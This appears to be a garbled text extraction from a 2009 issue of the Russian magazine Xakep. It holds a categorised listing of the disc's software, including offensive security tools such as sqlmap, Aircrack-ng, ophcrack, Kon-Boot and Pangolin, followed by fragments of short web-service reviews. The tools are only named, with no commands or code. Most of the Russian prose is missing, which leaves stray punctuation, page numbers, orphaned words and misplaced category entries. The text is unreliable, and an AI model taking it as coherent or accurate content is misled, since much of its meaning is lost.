>Net
BluetoothView 1.30
Gmail Manager 0.5.7.2
HTTrack Website Copier 3.43
Psi for Windows 0.13
uTorrent 1.8.3

>Misc
7stacks 1.2
AutoHotkey 1.0.48.03
Ditto 3.16.7
f.lux
High Sign Alpha Preview 2
MyTourbook 9.07
Nexus 9.7b2
Stickies 6.7a

>Development
HelpNDoc 2.1
IronRuby 0.9
JProfiler 5.2
Microsoft Expression Blend 3 +
SketchFlow
Microsoft Silverlight 3 SDK
Microsoft Silverlight 3 Tools for
Visual Studio 2008 SP1
MySQL Workbench 5.2 Alpha
Silverlight 3 Toolkit July 2009
Translate.Net 0.1.3493
WinHex 15.4

>>WINDOWS
>Dailysoft
7-Zip 4.65
AIMP 2.51
Autoruns for Windows v9.5
DAEMON Tools Lite 4.30.4
Download Master 5.5.12.1172
FarPowerPack 1.15
FileZilla Client 3.2.7-rc1
K-Lite Mega Codec Pack 5.0
Miranda IM 0.8.3
Mozilla Firefox 3.5.2
Notepad++ 5.4.5
Opera 9.64
PuTTY 0.60
QIP 2005 Build 8094
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
Xakep CD DataSaver 5.2
XnView 1.96.2
Project Voldemort
Apache CouchDB
Redis
MemcacheDB

>>UNIX
>Devel
Adobe AIR 1.5.2
Aptana Studio 1.5
Bouml 4.13.1

fingerprint'
Nmap
p0f v2
THC-Amap
httprint
NetworkMiner
ike-scan
Xprobe2
Satori
SinFP

>Security
Aircrack-ng 1.0RC4
bsqlbf 2.3
Charles 3.3.1
Damn Vulnerable Web App 1.0.4
dhcdrop 0.4
dradis 2.2
GFI LANguard 9
Kon-Boot 1.1
Microsoft KAPIMON 5.1
ophcrack 3.3.1
Pangolin 2.5.2.975
Privoxy2 3.0.14
ProxyStrike 2.1
SCRT Webshag 1.10
Sipflanker 1.5beta
sqlmap 0.7
Tor IM Browser Bundle 1.2.6
Watcher 1.2.1
Wireshark 1.2.1

>System
Apache HTTP Server Version 2.2
Agnitum Outpost Firewall Free 2009
AVG Anti-Virus Free Edition 8.5
DiskDigger 0.8.3
HDDScan 3.2
HWiNFO32 3.10
MyDefrag 4.1.2
Outpost Firewall Pro 2009
Process Lasso 3.63b
R-Studio 5.00
UNetbootin 3.57
USB-Drive Protector 1.02
VirtualBox 3.0.2
Xming 7.4.0.3

>Multimedia
ImgBurn 2.5
MediaInfo 0.7.9
MetatOGGer 3.9.2.0
Nero Free 9.4.12.3
PDFTools 1.3
Shup 0.27
SmillaEnlarger 0.8
STDU Viewer 1.5.275
VirtualDub 1.9.4
VLC (VideoLAN) 1.0.1

>Security
Aircrack-ng 1.0rc4
beholder 0.8.6
dhcdrop 0.4
Dradis 2.2.0
Grendel Scan 1.0
Justniffer 0.5.6
Middler 1.0
mysqltr4cker 1.2
Nmap 5.0
nschaind 0.3
packet-o-matic 20090726
PHPIDS 0.6
Privoxy 3.0.14b
sipflanker 1.5beta
sshdautoban 0.75
Tor 0.2.0.35
Vidalia 0.1.15
VoIPER 0.0.7
WEPBuster 1.0
Yaptest 0.2.1

>X-Distr
Linux From Scratch 6.4
Solaris 10

>System
ATI 9.7
Collectd 4.7.2
JPC
Linux Kernel 2.6.30.4
LVM2 2.02.50
Man pages 3.22
nVidia 185.18.29
quagga 0.99.14
Safecopy 1.5
Sudo 1.7.2
Virtualbox 3.0.2
Wine 1.1.26
Xf86-video-intel 2.8.0

>Net
Adobe Flash Player 10.0.32.18
aria2 1.5.1
Arora 0.8
Fetchmail 6.3.10
Flock 2.5.1
gPodder 0.17.0
KMess 2.0
Liferea 1.6
Linuxdcpp 1.0.3
Lynx 2.8.7
Minitube 0.5
Miro 2.5
Mozilla Firefox 3.5.1
Opera 9.64
Psi 0.13
Putty 0.60
qutIM 0.2 beta2
Sylpheed 2.7
WeeChat 0.3.0 rc2
Xchat 2.8.6

>Games
ManiaDrive 1.2

>Server
Apache 2.2.12
Asterisk 1.4.26
BIND 9.4.3 P3
Cups 1.4rc1
Dovecot 1.2.2
HAproxy 1.3.19
Hybrid 7.2.3
IRC Services 5.1.9
Kamailio 1.5.2
NFS Ganesha 0.99.57
OpenDS 2.0
OpenLDAP 2.4.17
OpenSSH 5.2
OpenVPN 2.1rc19
Prosody 0.5.1
rsyslog 4.5.1
Samba 3.4
Squid 3.0.STABLE17
Xorg server 1.6.3

Bugzilla 3.4
Bviplus 0.5.2
Clutter 1.0.0
Django 1.1
gtk+ 2.17.6
GtkHTML 3.26.3
jEdit 4.2
MILEPOST GCC 4.4.0
MPS 1.0
Nasm 2.07
pgAdmin 1.10.0
Scons 1.2.0
SmartCVS 7.0.9
SWIG 1.3.39
Unique 0.18
Zend Framework 1.9.0
Zend Studio 7.0

08(128) 2009

x
. 26


fingerprinting

. 20

SQL



: 2
10
.

. 52

PCI

SQL!

START

. 56

. 46

08 (128) 2009

HTTP://WWW2

WHAT THE FONT?


new.myfonts.com/
WhatTheFont

.
- . ,
, .
What The Font ,
, .

. , ,
-
-.


Firefox

FIREFOX BUILDER
ffbuilder.ru

,
Firefox, .
. : ffbuilder.ru . : , ,
!

144

PHOTOSHOP ONLINE
www.photoshop.com

Adobe -
Photoshop. , ,
. ,
, ,
Photoshop online. ,

.

Linux-

SUSE STUDIO

susestudio.com
!
- .
JeOS, openSUSE SUSE Linux Enterprise,
,
.
: ISO-, LiveCD,
Xen VMware.
, !
X 08 /128/ 09